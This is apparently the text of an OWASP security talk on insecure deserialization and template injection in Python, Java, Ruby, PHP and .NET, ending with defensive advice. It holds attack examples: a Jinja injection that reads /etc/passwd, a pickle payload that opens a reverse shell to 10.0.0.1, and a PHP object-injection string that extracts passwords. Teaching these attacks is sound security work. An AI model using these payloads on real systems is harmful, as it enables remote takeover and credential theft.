Threats to Modern Serialization Capabilities

2. Vlada Kulish
Security Engineer
OWASP Lviv member

3. What is de/serialization
Why is it important
How it works and what’s the issue
Examples & Demo

4. Idea

5. Types
BINARY
Java, Ruby
READABLE
YAML, XML, JSON
HYBRID
Python, PHP, Binary XML/JSON

6. Where it is
Communicating data to different systems, process
Wire protocols, web services
Storing and re-using data
Databases, cache servers, file systems
Tokens
HTTP cookies, HTML form parameters, API auth tokens

7. 2015 - java deserialization apocalypse

8. Are other languages safe?

10. Server-Side Template Injection
http://address/injectedData Server Template
{{5*5}}
{{5*5}}
25
{{5*5}}

11. Problem
@app.errorhandler(404)
def page_not_found(e):
template = '''{%% extends "layout.html"
%%}
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't
exist.</h1>
<h3>%s</h3>
</div>
{%% endblock %%}
''' % (request.url)
return render_template_string(template),
404
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>aaa{{5*5}}</h3>
</div>
{%% endblock %%}

12. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

13. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
<type 'str'>, <type 'basestring'>, <type 'object'>.__class__.__mro__
[<type 'type'>, <type 'weakref'>, …, <type 'file'>,
<type 'PyCapsule'>….]
.__subclasses__()

14. How it works
type
class
object
subclass
type
params

15. It's DEMO time:)

16. Python
Pickle
Protocol v.0 – ACSII
Protocol v.1 – Old binary format
Protocol v.2 – New binary format

17. Pickle Virtual Machine
Reconstruct a dict from the contents of the pickle.
Create a class instance of the pickled object.
Populate the class instance with the dict elements
Instructure
engine
Stack Memo

18. GLOBAL and REDUCE
Reduce -
executes the
callable
Global – loads
class object
onto the PVM
stack

19. Overwriting
Old <Legitimate pickle>
New <Inserted shellcode>
Result Result of inserted shellcode, likely an error

20. Prepending
Old <Legitimate pickle>
New <Shellcode and some empty stack><Legitimate pickle>
Result Original object

21. Altering
Old <Legitimate pickle>…S’<html><h1>AAA…’n
<Legitimate pickle>
New <Legitimate pickle>…S’<html><h1>Surprise!…’n
<Legitimate pickle>
Result Identically-typed object to original with altered
attribute value

22. Injecting
Old <Legitimate pickle>…S’<html><body>Foo…’n
<Legitimate pickle>
New <Legitimate pickle>…S’<html><body>
<Instruction returning string>…’n
<Legitimate pickle>
Result Identically-typed object to original with new
attribute value assigned by executed instructions

23. Limitations
There is no branching instruction
There is no comparison instruction
No exceptions and no error handling
A pickle stream cannot overwrite or directly read itself using
Pickle instructions
Strings loaded in pickles do not undergo variable substitution
Class instances and their methods cannot be directly referenced
Only callables that are present in the top-level of a module are
candidates for loading into the PVM

24. Vulnerable code
filename = ’/tmp/some_file’
pickle.load(open(filename, "rb"))
OR
def server(skt):
line = skt.recv(1024)
obj = pickle.loads(line)

25. Vulnerable code
def server(skt):
line = skt.recv(1024)
obj = pickle.loads(line)
import pickle
import socket
import os
class payload(object):
def __reduce__(self):
comm = "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"
return (os.system, (comm,))
payload = pickle.dumps( payload())

26. Useful Links
•http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_
Slaviero_Sour_Pickles_WP.pdf
•https://exploit-exercises.com/nebula/level17/
•https://blog.nelhage.com/2011/03/exploiting-pickle/

27. JAVA
How to detect
AC ED in HEX or R0 in base64
Java class names in the dump
Errors

29. Useful Links
https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
https://github.com/frohoff/ysoserial
http://jackson.thuraisamy.me/runtime-exec-payloads.html
https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-je
nkins-opennms-and-your-application-have-in-common-this-vulnerability

30. Ruby
CVE-2013-0156 Ruby on Rails XML processor YAML
deserialization code execution
Unsafe Object Deserialization Vulnerability
in RubyGems
CVE-2017-0903

31. Ruby on Rails (<4.1 by default) used Marshal.load() on user cookies
def reset_password
user = Marshal.load(Base64.decode64(params[:user])) unless
params[:user].nil?
…
end
<div class="content">
<%= hidden_field_tag 'user',
Base64.encode64(Marshal.dump(@user)) %>
…
</div>

32. Useful Links
http://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-v
ulnerability.html
https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-l
and-cve-2013-0156/
http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execu
tion-vulnerability-explained/
https://www.sitepoint.com/anatomy-of-an-exploit-an-in-depth-look-at
-the-rails-yaml-vulnerability/
https://github.com/OWASP/railsgoat/wiki/Extras:-Remote-Code-Executi
on

33. PHP
__destruct()
__wakeup()

34. PHP
if (isset ($_COOKIE['leet_hax0r'])) {
$sess_data = unserialize (base64_decode
($_COOKIE['leet_hax0r']));
…}
a:2:{s:2:"ip";s:15:“IP_addr";i:1;O:3:"SQL":2:{s:5:"que
ry";s:38:"SELECT password AS username FROM
users";s:4:"conn";N;}}

35. Real-life examples
CVE-2015-8562: Joomla Remote Code Execution
CVE-2015-7808: vBulletin 5 Unserialize Code Execution
CVE-2015-2171: Slim Framework PHP Object Injection

36. Useful Links
https://blog.checkpoint.com/wp-content/uploads/2016/08/Exp
loiting-PHP-7-unserialize-Report-160829.pdf
https://www.owasp.org/index.php/PHP_Object_Injection
https://www.tarlogic.com/en/blog/how-php-object-injection-
works-php-object-injection/
https://pagely.com/blog/2017/05/php-object-injection-insec
ure-unserialize-wordpress

37. .Net
CVE-2017-9424 - Breeze.Server.NET
CVE-2017-9785 - NANCYFX NANCY UP TO 1.4.3/2.0 JSON DATA
CSRF.CS
CVE-2017-9822 - DNN (aka DotNetNuke) before 9.1.1 Remote
Code Execution

38. Useful Links
https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/
DEFCON-25-Alvaro-Munoz-JSON-attacks.pdf
https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13t
h-JSON-Attacks-wp.pdf
https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_
Are_You_My_Type_WP.pdf
https://blog.scrt.ch/2016/05/12/net-serialiception/

39. The DEFENCE
Avoid magic methods
Use as simple formats as possible
Do not save session state on client
Use White and Blacklists for classes
Yes, manually serialize/ deserialize complex object
Authentication+ Encryption
DON’T TRUST DATA – VERIFY IT
Use sandboxes

40. Thank you!
Thanks https://explodingkittens.com/ for good mood and design ideas!